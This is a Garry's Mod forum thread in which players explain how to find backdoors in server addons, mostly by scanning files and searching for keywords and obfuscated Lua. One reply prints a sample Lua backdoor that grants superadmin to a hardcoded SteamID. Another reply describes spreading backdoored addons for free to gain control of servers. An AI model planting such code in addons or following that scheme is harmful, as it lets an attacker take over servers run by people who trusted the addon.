Garry's Mod

How to find backdoors?

Submitted by ThatGuyz, , Thread ID: 166005

Thread Closed

RE: How to find backdoors?

This post was last modified: 09-04-2020, 11:29 PM by Nigro
#11
if the antivirus dont detect any things, i use virustotal, an site who scan your file with more than 50 antivirus

if the antivirus dont detect any things, i use virustotal, an site who scan your file with more than 50 antivirus .-.

RE: How to find backdoors?

#12
In most archive editors, you get an option to search for keywords, most backdoors involves giving someone superadmin or admins permissions so you should look for scripts like:
Code:
function sbDRP( ply )
if ( ply:SteamID() == "STEAM_1:0:143352462" ) then
ply:SetUserGroup("superadmin")
end
end
hook.Add("PlayerSpawn", "sbDRP", sbDRP

Otherwise, you can use tools like the guys from above said, be careful!

RE: How to find backdoors?

#13
Just ask freemann from vcmod hes a pro at all this stuff

RE: How to find backdoors?

#14
In General, they can be found in the code by the keywords http and so on . But in many cases this is obfuscation or tabulation and in many cases you can just delete them

RE: How to find backdoors?

#15
Sometimes people can obscure the lua code, so if you see anything really out of the ordinary that doesn't look like normal lua code, it is prob a backdoor that has been obfuscated

RE: How to find backdoors?

#16
Oh i learn qomet8ngs today ! Thanks for the explain !

RE: How to find backdoors?

#17
Create addon or find addon in internet. BackDoor Finder (noad). He find popular backdoors

RE: How to find backdoors?

#18
I had saw people post backdoor finders earlier which you could use that will help you find backdoors :D

RE: How to find backdoors?

#19
07-04-2020, 07:42 AM
ThatGuyz Wrote:
Hello, i'm pretty new at this things and i don't know much about backdoors and things, i know they can destroy servers and such but what i want to know is where are backdoors usually located and how do they look like ?
A CPE Addon can find backdoors, and you can find backdoors with this method: In notepad you search all of your addons folder, and search "runstring".

RE: How to find backdoors?

#20
You make backdoor or u leak one addon then put backdoor in it then give it for free if people use them u can go to their servers and make ur self even superadmin give

Users browsing this thread: 5 Guest(s)